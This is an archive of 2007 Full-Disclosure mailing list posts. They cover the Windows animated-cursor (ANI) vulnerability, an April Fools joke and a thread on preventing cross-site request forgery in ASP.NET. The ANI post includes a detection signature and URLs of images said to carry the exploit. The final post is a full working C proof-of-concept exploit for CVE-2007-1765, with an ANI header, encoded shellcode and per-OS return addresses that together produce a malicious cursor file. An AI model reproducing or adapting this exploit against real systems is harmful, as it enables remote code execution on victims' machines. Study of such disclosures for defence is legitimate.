 Today Microsoft released a security advisory about a vulnerability in the
 Animated Cursor processing code in Windows:
 http://www.microsoft.com/technet/security/advisory/935423.mspx
 
 It seems like the vulnerability is already exploited in the wild:
 http://asert.arbornetworks.com/2007/03/any-ani-file-could-infect-you/

Bleeding Edge Threats made available Snort rule that detects some (all?)
exploits using this vulnerability:
http://www.bleedingthreats.net/index.php/2007/03/30/ms-ani-exploit-rule-details-emerging/

I don't know if this rule detects all possible exploits or just one
particular type. Here is a Firekeeper version of the rule, which can
be used to detect sites hosting malicious files:

alert (msg:BLEEDING-EDGE CURRENT EVENTS MS ANI exploit; body_content:|54 53 
49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69 68 
52|; reference:url,http://isc.sans.org/diary.html?storyid=2534; 
reference:url,http://www.avertlabs.com/research/blog/?p=233; 
reference:url,doc.bleedingthreats.net/2003519; fid:2003519; rev:1;)


Rule is triggered for example by the following images:  
 
http://www.i5460.net/admin12/2.jpg  

http://www.i5460.net/admin12/1.jpg 


Cheers,
Jan Wrobel
http://firekeeper.mozdev.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] n3td3v calls for immediate halt to the month of Myspace bugs

2007-03-30 Thread n3td3v
To all,

Crew-X Security and n3td3v call for the immediate halt of the month of
Myspace bugs.

Who is n3td3v...
http://n3td3v.googlepages.com

Our honeypot on Myspace...
http://myspace.com/n3td3v

Happy April fool(s),

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]

2007-03-30 Thread Chris Weber
Actually that's not true.  We should be clear that this is *not* the same
thing as ViewStateUserKey (which is not enabled by default).
EnableEventValidation does provide postback input related protections, but
ViewStateUserKey actually ties it to the user session.  Without
ViewStateUserKey, you will notice the __EVENTVALIDATION nonce will be the
same for any two users.  With ViewStateUserKey, the value will be unique per
user.



-Original Message-
From: Michael Sutton [mailto:[EMAIL PROTECTED] 
Sent: Friday, March 30, 2007 3:59 PM
To: Chris Weber; pdp (architect); full-disclosure@lists.grok.org.uk; WASC
Forum; webappsec @OWASP
Subject: RE: [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET
crowd]

The EnableEventValidation page directive (enabled by default since .Net
2.0) applies a nonce value for form validation and is also a strong control
to prevent CSRF attacks. 

Michael Sutton
Security Evangelist
SPI Dynamics
http://portal.spidynamics.com/blogs/msutton

 -Original Message-
 From: Chris Weber [mailto:[EMAIL PROTECTED]
 Sent: Friday, March 30, 2007 6:12 PM
 To: 'pdp (architect)'; full-disclosure@lists.grok.org.uk; 'WASC
Forum';
 'webappsec @OWASP'
 Subject: RE: [WEB SECURITY] Preventing Cross-site Request Forgeries 
 [ASP.NET crowd]
 
 Nice article.
 
 For the ASP.NET crowd out there, the will be even more simple, one
line of
 code.  Set the ViewStateUserKey property in your base class or page
and
 the
 unique token protections (similar to CSRF_Guard) will be provided for
you.
 
 http://msdn2.microsoft.com/en-
 us/library/system.web.ui.page.viewstateuserkey
 .aspx
 
 This protection mechanism has been available for many years, since the 
 Framework 1.1
 
 
 
 
 
 -Original Message-
 From: pdp (architect) [mailto:[EMAIL PROTECTED]
 Sent: Friday, March 30, 2007 3:16 AM
 To: full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP
 Subject: [WEB SECURITY] Preventing Cross-site Request Forgeries
 
 http://www.gnucitizen.org/blog/preventing-csrf
 
 I briefly covered how simple it is to prevent CSRF attacks. Hope that
you
 find it useful.
 
 --
 pdp (architect) | petko d. petkov
 http://www.gnucitizen.org
 


--
 --
 Join us on IRC: irc.freenode.net #webappsec
 
 Have a question? Search The Web Security Mailing List Archives:
 http://www.webappsec.org/lists/websecurity/
 
 Subscribe via RSS:
 http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
 
 


--
 --
 Join us on IRC: irc.freenode.net #webappsec
 
 Have a question? Search The Web Security Mailing List Archives:
 http://www.webappsec.org/lists/websecurity/
 
 Subscribe via RSS:
 http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-03-30 Thread dev code
/*
* Copyright (c) 2007 devcode
*
*
*   ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
*error within the LoadAniIcon() [user32.dll] function when rendering
*cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
*tricking a user into visiting a malicious web page or viewing an email
*message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
*This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include iostream

/* ANI Header */
unsigned char uszAniHeader[] =
\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68
\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00
\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02
\x61\x6E\x69\x68\xA8\x03\x00\x00;

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49
\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42
\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32
\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a
\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c
\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57
\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50
\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d
\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f
\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a
\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76
\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65
\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78
\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f
\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65
\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d
\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31
\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69
\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61
\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70
\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42;

char szIntro[] =
\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n
\t\t\tdevcode (c) 2007\n
[+] Targets:\n
\tWindows XP SP2 [0]\n
\tWindows 2K SP4 [1]\n\n
Usage: ani.exe target file;

typedef struct {
const char *szTarget;
unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
{ Windows XP SP2, \xC9\x29\xD4\x77 },   /* call esp */
{ Windows 2K SP4, \x29\x4C\xE1\x77 }
};

int main( int argc, char **argv ) {
char szBuffer[1024];
FILE *f;

if ( argc  3 ) {
printf(%s\n, szIntro );
return 0;
}

printf([+] Creating ANI header...\n);
memset( szBuffer, 0x90, sizeof( szBuffer ) );
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

printf([+] Copying shellcode...\n);
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );

printf(%s\n, argv[2] );
f = fopen( argv[2], wb );
if ( f == NULL ) {
printf([-] Cannot create file\n);
return 0;
}

fwrite( szBuffer, 1, 1024, f );
fclose( f );
printf([+] .ANI file succesfully created!\n);
return 0;
}

_
Interest Rates near 39yr lows! $430,000 Mortgage for $1,399/mo - Calculate 
new payment